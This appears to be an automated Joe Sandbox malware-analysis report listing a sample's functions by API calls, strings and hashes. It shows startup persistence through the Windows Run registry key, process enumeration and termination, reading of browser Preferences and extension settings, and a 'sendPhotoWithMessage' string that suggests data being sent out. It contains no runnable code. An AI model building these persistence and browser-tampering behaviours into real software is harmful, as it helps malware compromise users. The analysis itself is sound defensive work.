Part of subcall function 00007FF643F7C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7C9E4

Part of subcall function 00007FF643F78340: RtlFreeHeap.NTDLL(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78356
Part of subcall function 00007FF643F78340: GetLastError.KERNEL32(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78360

Part of subcall function 00007FF643F6CD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF643F6CD0F,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F6CD69
Part of subcall function 00007FF643F6CD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF643F6CD0F,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F6CD8E

Part of subcall function 00007FF643F8695C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F868A7

_get_daylight.LIBCMT ref: 00007FF643F7D2FC

Part of subcall function 00007FF643F7CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7CA44

_get_daylight.LIBCMT ref: 00007FF643F7D572
_get_daylight.LIBCMT ref: 00007FF643F7D583
_get_daylight.LIBCMT ref: 00007FF643F7D594
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF643F7D7D4), ref: 00007FF643F7D5BB

Strings

Eastern Summer Time, xrefs: 00007FF643F7D679
Eastern Standard Time, xrefs: 00007FF643F7D661

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: f6ffeae5673c8de371c0e9f3875728c18a8d6f78cbc9436f7dd89e17034f8244
Instruction ID: 3fa83966b82d8de1679e306c3aca37efab9b1b415b2c5ff1565749fb766a4bbf
Opcode Fuzzy Hash: f6ffeae5673c8de371c0e9f3875728c18a8d6f78cbc9436f7dd89e17034f8244
Instruction Fuzzy Hash: 75D1AE66A0C24286F7A4FF26D8525B96761EF84784F844136EE4DE7AC6EF3CE441E340

Function 00007FF643F7E170 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF643F7DD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7DD95
Part of subcall function 00007FF643F7DD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7DE13
Part of subcall function 00007FF643F7DD54: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7DE64

CreateFileW.KERNEL32 ref: 00007FF643F7E276
CreateFileW.KERNEL32 ref: 00007FF643F7E2C6
GetLastError.KERNEL32 ref: 00007FF643F7E2F6
GetFileType.KERNEL32 ref: 00007FF643F7E30B
GetLastError.KERNEL32 ref: 00007FF643F7E315
CloseHandle.KERNEL32 ref: 00007FF643F7E348
CloseHandle.KERNEL32 ref: 00007FF643F7E4AB
CreateFileW.KERNEL32 ref: 00007FF643F7E4E0
GetLastError.KERNEL32 ref: 00007FF643F7E4EF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
Instruction ID: 9c46849c12c750c965115a3def23792a6fb97571b558704a85b75fc05ad0b371
Opcode Fuzzy Hash: 96994052f686da90be6cdd5d0272697e511c0871d647bfaba78ffb88d0ffef50
Instruction Fuzzy Hash: 75C1C136B28A4285EB90FF68C4926AC7761FB59B98F011236DE1EA73D5DF38E055D300

Function 00007FF643F7D544 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF643F7D572

Part of subcall function 00007FF643F7CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7CA44

_get_daylight.LIBCMT ref: 00007FF643F7D583

Part of subcall function 00007FF643F7C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7C9E4

_get_daylight.LIBCMT ref: 00007FF643F7D594

Part of subcall function 00007FF643F7CA00: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7CA14

Part of subcall function 00007FF643F78340: RtlFreeHeap.NTDLL(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78356
Part of subcall function 00007FF643F78340: GetLastError.KERNEL32(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78360

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF643F7D7D4), ref: 00007FF643F7D5BB

Strings

Eastern Summer Time, xrefs: 00007FF643F7D679
Eastern Standard Time, xrefs: 00007FF643F7D661

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
Instruction ID: 37ea61798b2952612050291d87474235676dbaa67a332eca4694c4f5a9c3ae84
Opcode Fuzzy Hash: 605e4d1620cc9cfca92c84b904f75bcfa21439f3ad89b664e143ebe8e45af373
Instruction Fuzzy Hash: 2C519F72A0C64286F3A0FF25D8925A97760BB88784F804136EE4DE7BD6DF3CE4419740

Function 00007FF643F5DF9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF643F22A65), ref: 00007FF643F5DFC2
FormatMessageA.KERNEL32 ref: 00007FF643F5DFF5

Strings

!x-sys-default-locale, xrefs: 00007FF643F5DFB5

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
Instruction ID: 0836a428024dc9c9729ad91864816e67e34739cdc363cafdf21d73ac80693006
Opcode Fuzzy Hash: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
Instruction Fuzzy Hash: DD01D272B0C78282E791AF12F4517BA67A1FB94794F048035EA4997BD9CF3CD501CB00

Function 00007FF643F2A691 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 310fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE ref: 00007FF643F2A6EE
FindClose.KERNEL32 ref: 00007FF643F2A71B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A76D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A773
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A77F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A785
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F2A78B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F2A7FC
__std_fs_code_page.LIBCPMT ref: 00007FF643F2A883

Strings

exists, xrefs: 00007FF643F2A7A4
directory_iterator::directory_iterator, xrefs: 00007FF643F2A7B8
directory_entry::status, xrefs: 00007FF643F2A7CF
1, xrefs: 00007FF643F2A8AD

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Find$CloseConcurrency::cancel_current_taskFileNext__std_fs_code_page
String ID: 1$directory_entry::status$directory_iterator::directory_iterator$exists
API String ID: 1745604696-621175605
Opcode ID: 399117e4ada8f37826c2442cce25861bf031eae4663afd2a448d856ce16d2512
Instruction ID: 0e21b0e75a52f83d0bec8e5c7d973da5622d5a6eee905a6b77fb32c9bbfab455
Opcode Fuzzy Hash: 399117e4ada8f37826c2442cce25861bf031eae4663afd2a448d856ce16d2512
Instruction Fuzzy Hash: 92D1C762E1CBC2C1EAA0BB15E5423BE6361FB857A4F105631DAACA36D5DF7DE480D700

Function 00007FF643F30D05 Relevance: 19.7, APIs: 2, Strings: 9, Instructions: 451COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F2EF46

Part of subcall function 00007FF643F5E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF643F23F96), ref: 00007FF643F5E0C6

Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23B25
Part of subcall function 00007FF643F23AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF643F23BCA

__std_fs_code_page.LIBCPMT ref: 00007FF643F2F01E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E1D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E2F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30E6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30ECA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30ED0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30ED6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30F6C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FD0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FD6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FDC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F30FE2

Strings

\Preferences, xrefs: 00007FF643F30D21
pinned_extensions, xrefs: 00007FF643F2F718, 00007FF643F2F72F, 00007FF643F2F755
\Extensions, xrefs: 00007FF643F2EDD0
extensions, xrefs: 00007FF643F2F5DC, 00007FF643F2F5F9, 00007FF643F2F617, 00007FF643F2F63E, 00007FF643F2F674, 00007FF643F2F6C6, 00007FF643F2F6E3, 00007FF643F2F701
developer_mode, xrefs: 00007FF643F2F661, 00007FF643F2F697
File parse failed, xrefs: 00007FF643F2F2FF
name, xrefs: 00007FF643F2F371, 00007FF643F2F398
\Secure Preferences, xrefs: 00007FF643F30D1A
profile, xrefs: 00007FF643F2F322, 00007FF643F2F33F, 00007FF643F2F35D, 00007FF643F2F384

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page__std_fs_convert_narrow_to_wide$ApisFile
String ID: File parse failed$\Extensions$\Preferences$\Secure Preferences$developer_mode$extensions$name$pinned_extensions$profile
API String ID: 2697701713-219585183
Opcode ID: 94e3588e4d620914e7689faac4ce99a83f9a6a5d6724d37955c1855788994bc9
Instruction ID: 6e75ac9c4e4afd2ff7c6082e61ceac5a29402281482420278f70d8b94c46b611
Opcode Fuzzy Hash: 94e3588e4d620914e7689faac4ce99a83f9a6a5d6724d37955c1855788994bc9
Instruction Fuzzy Hash: E6327362A1CBC281EAB0FB14E4523EA6365FBC1744F804136D68DA7ADAEF7DD544DB00

Function 00007FF643F33A10 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 169
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF643F33A5A
RegSetValueExA.KERNEL32 ref: 00007FF643F33B35
RegCloseKey.ADVAPI32 ref: 00007FF643F33B43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F33CC7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F33CCD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F33CD3

Strings

Error adding startup program: , xrefs: 00007FF643F33C50
Successfully added ', xrefs: 00007FF643F33B89
' to startup., xrefs: 00007FF643F33BA1
Error opening registry key: , xrefs: 00007FF643F33A6B
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF643F33A4C

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseOpenValue
String ID: ' to startup.$Error adding startup program: $Error opening registry key: $Software\Microsoft\Windows\CurrentVersion\Run$Successfully added '
API String ID: 31251203-1688488963
Opcode ID: b703b02646074489869ecfbf97e9363cdb7401458bef78d5369863472edcd9e6
Instruction ID: 5d558b4a38a4610cfc644158ad49acc1c7547fc2c686369d58a0d786a20c4484
Opcode Fuzzy Hash: b703b02646074489869ecfbf97e9363cdb7401458bef78d5369863472edcd9e6
Instruction Fuzzy Hash: 97719362B1CA8141EA50FB65E44636D6361EB857F4F105332E6BDA3BE9DF3CE481A700

Function 00007FF643F37970 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcesses.KERNEL32(FFFFFFFF), ref: 00007FF643F379A3
OpenProcess.KERNEL32 ref: 00007FF643F37A1C
K32EnumProcessModules.KERNEL32 ref: 00007FF643F37A7D
K32GetModuleBaseNameW.KERNEL32 ref: 00007FF643F37A9D
TerminateProcess.KERNEL32 ref: 00007FF643F37B09
CloseHandle.KERNEL32 ref: 00007FF643F37BA2

Strings

Successfully terminated process: , xrefs: 00007FF643F37B22
Failed to terminate process: , xrefs: 00007FF643F37B80
Failed to enumerate processes, xrefs: 00007FF643F379AD

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Process$Enum$BaseCloseHandleModuleModulesNameOpenProcessesTerminate
String ID: Failed to enumerate processes$Failed to terminate process: $Successfully terminated process:
API String ID: 3307072288-2317428871
Opcode ID: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
Instruction ID: 3257c850f6cbaa6de6e49d6e551c6606c770cdae9c50923ff559a6bf4a298971
Opcode Fuzzy Hash: 815cd1cb688fd9ef628a1d8ef551826680de811007e8f08c6bd7e366a7174039
Instruction Fuzzy Hash: 2D515471A0CA8681EAA0BF11E4422FA6361FF957C4F444135DA9DA3BE9EF7CD149D700

Function 00007FF643F5E7C8 Relevance: 16.7, APIs: 11, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_fs_open_handle.LIBCPMT ref: 00007FF643F5E808

Part of subcall function 00007FF643F5E770: CreateFileW.KERNEL32 ref: 00007FF643F5E7A3
Part of subcall function 00007FF643F5E770: GetLastError.KERNEL32 ref: 00007FF643F5E7B2

SetFileInformationByHandle.KERNEL32 ref: 00007FF643F5E832
__std_fs_open_handle.LIBCPMT ref: 00007FF643F5E86A
CloseHandle.KERNEL32 ref: 00007FF643F5E884
GetLastError.KERNEL32 ref: 00007FF643F5E8B8
GetFileInformationByHandleEx.KERNEL32 ref: 00007FF643F5E904
GetLastError.KERNEL32 ref: 00007FF643F5E912
CloseHandle.KERNEL32 ref: 00007FF643F5E928
SetFileInformationByHandle.KERNEL32 ref: 00007FF643F5E954
SetFileInformationByHandle.KERNEL32 ref: 00007FF643F5E988
GetLastError.KERNEL32 ref: 00007FF643F5E9AA

Part of subcall function 00007FF643F71774: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF643F68A1A,?,?,?,00007FF643F6CC32), ref: 00007FF643F7179A

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
String ID:
API String ID: 2221425841-0
Opcode ID: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
Instruction ID: ba83cfd313b3fc184c7e520f8bcbf51aee0e3f4bd770293b7ac64cc68a0322de
Opcode Fuzzy Hash: 6bdbc50bed84b278626fece3ce0b26b3c0551dd7d3482e459f54058572bd27a5
Instruction Fuzzy Hash: FA51D322F0C24288F7E4BB7198022FD2BA0AF657A4F148235CD5EF7AD6DF28E0059740

Function 00007FF643F2A810 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF643F2A883

Strings

await sendPhotoWithMessage(, xrefs: 00007FF643F2AD02
directory_iterator::directory_iterator, xrefs: 00007FF643F2A7B8, 00007FF643F2AC7D
status, xrefs: 00007FF643F2AC93
1, xrefs: 00007FF643F2A8AD

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __std_fs_code_page
String ID: 1$await sendPhotoWithMessage($directory_iterator::directory_iterator$status
API String ID: 1686256323-4148110692
Opcode ID: bbfa7b615f8a2897cdd336dbb51fca4bcc0a43af47892d00125171a54d80ca7c
Instruction ID: bd5b8704691e9cd187908cbadaa0cb1f32af8f15278ab136b1c3deb4c863d20c
Opcode Fuzzy Hash: bbfa7b615f8a2897cdd336dbb51fca4bcc0a43af47892d00125171a54d80ca7c
Instruction Fuzzy Hash: 0EE1B262A1CBC5C2DAA0BB25E6413AE7361FB85BA0F148232DA9D937D5DF3DD481D700

Function 00007FF643F35850 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 130
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF643F358E4
GetLastError.KERNEL32 ref: 00007FF643F35936
CloseHandle.KERNEL32 ref: 00007FF643F359D7
CloseHandle.KERNEL32 ref: 00007FF643F359E1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35A4D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F35A53

Strings

Process started successfully., xrefs: 00007FF643F359FA
Failed to start process. Error: , xrefs: 00007FF643F3594D

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CloseHandle_invalid_parameter_noinfo_noreturn$CreateErrorLastProcess
String ID: Failed to start process. Error: $Process started successfully.
API String ID: 1451358647-594763798
Opcode ID: 1d8fb6cd50ae36ec0fdab3cc94966e204139c79170fe90e2a8376b911ced0ee7
Instruction ID: e89876a6114eaa1fc5875fc4ab8fd9fb0e06afa51d029cce0c499e8f78665e89
Opcode Fuzzy Hash: 1d8fb6cd50ae36ec0fdab3cc94966e204139c79170fe90e2a8376b911ced0ee7
Instruction Fuzzy Hash: 8851A172E1CB8582EA40FB64E44126D6361EBD57A4F505336EAAC67AE9DF7CE080D700

Function 00007FF643F7BA50 Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7BE7D

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f0a2823fdefb3b3155acf7249247a10fc584efcf3507e7f2d6af8965ae07d372
Instruction ID: 51613648fe52081a6085c3aaeed6ab335d6db62bc28f59255e2f531ba25c73dc
Opcode Fuzzy Hash: f0a2823fdefb3b3155acf7249247a10fc584efcf3507e7f2d6af8965ae07d372
Instruction Fuzzy Hash: 0AC1E322A2C68791EBE0BB1594462BD3B91FB86B80F594131EA4D973D1DF7CEC48E300

Function 00007FF643F770FC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F7710B
FlsSetValue.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F77141
FlsSetValue.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F7716E
FlsSetValue.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F7717F
FlsSetValue.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F77190
SetLastError.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F771AB

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
